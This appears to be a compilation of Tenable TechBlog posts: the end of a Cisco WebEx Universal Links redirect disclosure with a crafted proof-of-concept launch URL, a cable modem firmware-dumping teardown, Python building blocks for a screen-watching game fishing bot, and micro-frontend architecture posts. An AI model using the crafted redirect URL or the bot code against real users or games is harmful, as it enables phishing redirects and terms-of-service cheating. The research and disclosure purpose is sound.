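Running the same two functions over a real ‘p’ value should yield the settings object and the Universal Links URL shown above.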

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.
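For contrast, here is roughly what a validation step could look like. This is a hedged sketch, not Cisco's fix: the allowed domain suffix and the `is_trusted_ulink` name are assumptions chosen for illustration.

```python
from urllib.parse import urlsplit

ALLOWED_SUFFIX = ".webex.com"  # assumption: legitimate links live under this domain


def is_trusted_ulink(url: str) -> bool:
    """Accept only https URLs whose host is webex.com or a subdomain of it."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    on_allowed_domain = host == "webex.com" or host.endswith(ALLOWED_SUFFIX)
    return parts.scheme == "https" and on_allowed_domain


checks = [
    is_trusted_ulink("https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks"),
    is_trusted_ulink("https://tenable.com"),
    is_trusted_ulink("https://webex.com.example.org/"),
]
print(checks)
```

Matching on the parsed hostname rather than on a substring of the URL is what keeps look-alike hosts such as the third example from passing.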

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pI
WTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)


Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

ARRIS CABLE MODEM TEARDOWN

Picked up one of these a little while back at the behest of a good friend.

https://www.surfboard.com/globalassets/surfboard-new/products/sb8200/sb8200-pro-detail-header-hero-1.png

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.

THE HARDWARE

There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.

THE FIRMWARE

Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat

PARSING THE FIRMWARE

Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd

Jackpot.

Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on "brcmnand.1":
0x000000000000-0x000000620000 : "flash1.kernel0"
0x000000620000-0x000000c40000 : "flash1.kernel1"
0x000000c40000-0x000001fa0000 : "flash1.cm0"
0x000001fa0000-0x000003300000 : "flash1.cm1"
0x000003300000-0x000005980000 : "flash1.rg0"
0x000005980000-0x000008000000 : "flash1.rg1"
0x000000000000-0x000008000000 : "flash1"
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on "spi32766.0":
0x000000000000-0x000000100000 : "flash0.bolt"
0x000000100000-0x000000120000 : "flash0.macadr"
0x000000120000-0x000000140000 : "flash0.nvram"
0x000000140000-0x000000160000 : "flash0.nvram1"
0x000000160000-0x000000180000 : "flash0.devtree0"
0x000000180000-0x0000001a0000 : "flash0.devtree1"
0x0000001a0000-0x000000200000 : "flash0.cmnonvol0"
0x000000200000-0x000000260000 : "flash0.cmnonvol1"
0x000000260000-0x000000330000 : "flash0.rgnonvol0"
0x000000330000-0x000000400000 : "flash0.rgnonvol1"
0x000000000000-0x000000400000 : "flash0"

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.
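Since the next steps need an offset and a size for each partition, it can help to compute them from the log instead of by hand. The Python sketch below parses a few of the partition lines; `parse_partitions` is a hypothetical helper, and the regular expression tolerates both plain and typographic quotes and dashes in case the log was copied from a web page.

```python
import re

BOOT_LOG = '''\
0x000000000000-0x000000620000 : "flash1.kernel0"
0x000003300000-0x000005980000 : "flash1.rg0"
0x000005980000-0x000008000000 : "flash1.rg1"
'''

# start-end : "name", allowing an en dash and curly quotes as well.
LINE = re.compile(
    r'(0x[0-9a-fA-F]+)\s*[-\u2013]\s*(0x[0-9a-fA-F]+)\s*:\s*["\u201c](.+?)["\u201d]'
)


def parse_partitions(log: str) -> dict:
    """Map partition name -> (start offset, size in bytes)."""
    table = {}
    for match in LINE.finditer(log):
        start, end = int(match.group(1), 16), int(match.group(2), 16)
        table[match.group(3)] = (start, end - start)
    return table


parts = parse_partitions(BOOT_LOG)
start, size = parts["flash1.rg1"]
print(hex(start), hex(size))
```

For flash1.rg1 this gives a start of 0x5980000 and a size of 0x2680000, the same two numbers used when carving the partition out of the dump.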

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=$((0x2680000)) skip=$((0x5980000))
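If dd is not handy, or copying one byte at a time is too slow on a large dump, the same carve can be sketched in Python. `extract_region` is a hypothetical helper, and the self-check runs on a throwaway 16-byte file rather than a real dump.

```python
import os
import tempfile


def extract_region(src_path: str, dst_path: str, offset: int, size: int) -> int:
    """Copy `size` bytes starting at `offset` from src to dst; return bytes written."""
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        src.seek(offset)
        data = src.read(size)
        dst.write(data)
    return len(data)


# Tiny self-check on a temporary file instead of a real flash dump.
with tempfile.TemporaryDirectory() as tmp:
    dump_path = os.path.join(tmp, "dump.bin")
    out_path = os.path.join(tmp, "rg1")
    with open(dump_path, "wb") as f:
        f.write(bytes(range(16)))
    written = extract_region(dump_path, out_path, offset=4, size=8)
    with open(out_path, "rb") as f:
        extracted = f.read()

print(written, extracted.hex())
```

For the dump discussed here, the equivalent call would be `extract_region("dump.bin", "rg1", 0x5980000, 0x2680000)`.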

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

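This hints that we are likely looking at an adjacent layout: each 2 KiB page appears to be stored as four 512-byte data chunks, each immediately followed by 16 bytes of spare data (4 × 16 = 64 bytes of spare per page, which matches the chip documentation). The following Python script will handle stripping the spare data out of our dump.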

data_area = 512   # data bytes per chunk
spare = 16        # spare (OOB) bytes that follow each chunk
combined = data_area + spare

with open('rg1', 'rb') as f:
    dump = f.read()

count = len(dump) // combined
out = bytearray()
for i in range(count):
    # Keep the data bytes of chunk i and skip the spare bytes after them
    out += dump[i*combined : i*combined + data_area]

with open('rg1_stripped', 'wb') as f:
    f.write(out)

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
    dump = f.read()

with open('rg1_little', 'wb') as f:
    # Page size is 2048
    block = 2048
    nblocks = int(len(dump) / block)

    # Iterate over blocks, byte swap each 32-bit value
    for i in range(0, nblocks):
        current_block = dump[i*block:(i+1)*block]
        j = 0
        while j < len(current_block):
            section = current_block[j:j+4]
            f.write(section[::-1])
            j = j + 4
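A quick way to convince yourself the swap is doing the right thing is to try it on a known marker. UBI erase-count headers begin with the ASCII magic `UBI#`, so in a dump with every 32-bit word reversed that marker would show up as `#IBU`. The sketch below is an alternative way to write the same word swap using `struct`; `swap32` is a name chosen for this example.

```python
import struct


def swap32(data: bytes) -> bytes:
    """Reverse the byte order of every 32-bit word; len(data) must be a multiple of 4."""
    count = len(data) // 4
    # Read the words as little-endian, write them back as big-endian.
    words = struct.unpack("<%dI" % count, data)
    return struct.pack(">%dI" % count, *words)


swapped = swap32(b"#IBU\x01\x00\x00\x00")
print(swapped)
```

Seeing `UBI#` appear at the start of the converted file is a reasonable sign that tools like binwalk and ubireader will recognize it.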

Extract

Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs

Conclusion

Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!


ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New World’s Botting Problem

Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massively multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like PyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a never-ending game of cat and mouse. That said, bot operators can make this approach much safer by running their screen watchers on a totally different computer using perfectly legitimate tools. Windows Remote Desktop, TeamViewer, or some sort of VNC client are normal tools one would run to check in on a computer remotely. What’s to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, a bot run this way could still be detected, but detection takes much more effort and is more prone to false positives, which works against the game studio’s interests if it ends up banning legitimate players.
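To make the point about repetitive input concrete, here is a minimal sketch of one heuristic a detection system could apply: flag a session when the gaps between clicks are almost perfectly uniform. This is not how EasyAntiCheat or any real anti-cheat works. The function name, the 20-click minimum, and the 0.05 threshold are all assumptions chosen for illustration.

```python
from statistics import mean, pstdev


def looks_automated(click_times, min_clicks=20, cv_threshold=0.05):
    """Flag input whose inter-click gaps are suspiciously uniform.

    click_times: timestamps in seconds, in ascending order.
    cv_threshold: hypothetical cutoff for the coefficient of variation.
    """
    if len(click_times) < min_clicks:
        return False  # not enough data to judge
    # Time elapsed between each pair of consecutive clicks
    gaps = [later - earlier for earlier, later in zip(click_times, click_times[1:])]
    average_gap = mean(gaps)
    if average_gap <= 0:
        return False
    # Coefficient of variation: spread of the gaps relative to their mean
    return pstdev(gaps) / average_gap < cv_threshold
```

A scripted clicker firing every two seconds produces gaps with no spread at all and gets flagged, while input with irregular gaps does not. A real system would need far more signals than this one to avoid banning legitimate players.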

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which, incidentally, have reportedly already been detected by the anti-cheat and gotten players banned.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what components will we need?

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
import mss.tools

# 500x500 pixel region, given as (left, top, right, bottom)
region = (500, 500, 1000, 1000)

with mss.mss() as screen:
    while True:
        # Grab the region and save it to disk
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our screen capture. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
import mss.tools
from numpy import array

# Template to look for, loaded as a 3-channel BGR image
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_COLOR)

# 500x500 pixel region, given as (left, top, right, bottom)
region = (500, 500, 1000, 1000)

with mss.mss() as screen:
    while True:
        # Grab region
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")
        # Convert the BGRA capture to the 3-channel BGR format of the template
        img_cv = cv2.cvtColor(array(img), cv2.COLOR_BGRA2BGR)
        # Check if the Tenable logo is present
        result = cv2.matchTemplate(img_cv, to_detect, cv2.TM_CCOEFF_NORMED)
        if (result >= 0.6).any():
            print('DETECTED')
            break

Running the above and dragging a copy of the logo into the captured region of the screen will trigger the “DETECTED” message. Note that this code snippet may not work exactly as written depending on your monitor setup and configured resolution; some settings might need to be tweaked in certain scenarios.
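For a rough idea of what the 0.6 threshold above is being compared against, the sketch below computes a normalized correlation coefficient in plain Python on tiny grayscale grids. It is a simplified illustration of the idea behind cv2.TM_CCOEFF_NORMED, not OpenCV’s implementation, and the helper names ncc_score and best_match are made up for this example.

```python
from math import sqrt


def ncc_score(window, template):
    """Normalized correlation coefficient of two equal-sized grayscale patches."""
    w = [pixel for row in window for pixel in row]
    t = [pixel for row in template for pixel in row]
    w_mean = sum(w) / len(w)
    t_mean = sum(t) / len(t)
    # Correlate the mean-subtracted patches, then normalize by their energy
    numerator = sum((a - w_mean) * (b - t_mean) for a, b in zip(w, t))
    denominator = sqrt(
        sum((a - w_mean) ** 2 for a in w) * sum((b - t_mean) ** 2 for b in t)
    )
    # A flat patch has no variation to correlate against, so score it as 0
    return numerator / denominator if denominator else 0.0


def best_match(image, template):
    """Slide the template over the image; return (best score, (row, col))."""
    t_height, t_width = len(template), len(template[0])
    best = (-1.0, (0, 0))
    for r in range(len(image) - t_height + 1):
        for c in range(len(image[0]) - t_width + 1):
            window = [row[c:c + t_width] for row in image[r:r + t_height]]
            score = ncc_score(window, template)
            if score > best[0]:
                best = (score, (r, c))
    return best
```

Scores range from -1 to 1, so a threshold of 0.6 accepts windows that resemble the template reasonably well without requiring a pixel-perfect match.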

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.


New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

1. Introduction: Our Journey Implementing a Micro Frontend

Introduction: Our Journey Implementing a Micro Frontend

In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.

What This Series is About

While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.

The series is broken up into the following articles:

  • Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
  • Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
  • Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
  • Module Federation — Managing Your Micro-Apps — Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
  • Module Federation — Sharing Vendor Code — Details the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
  • Summary — Reviews everything we discussed and provides some key takeaways from this series.

Who is This For?

If you find yourself in any of the categories below, then this series is for you:

  • You’re an engineer just getting started, but you have a strong interest in architecture.
  • You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
  • You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
  • You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
  • You really just like to read!

In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.

How Articles are Structured

Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high-level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.

The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.

Summary

So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.


1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

2. Why We Implemented A Micro Frontend

Why We Implemented A Micro Frontend

This is post 2 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.

Our Initial Architecture

When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:

  • Design System Repository — This contained all the global components that were used by Tenable.io. Each iteration of a given component was published to a Nexus repository (our private npm repository) using Lerna. Package versions were incremented following semver (e.g., 1.0.0). It also housed a static design system site, which was responsible for documenting the components and how they were to be used.
  • Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.

This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:

The Problem

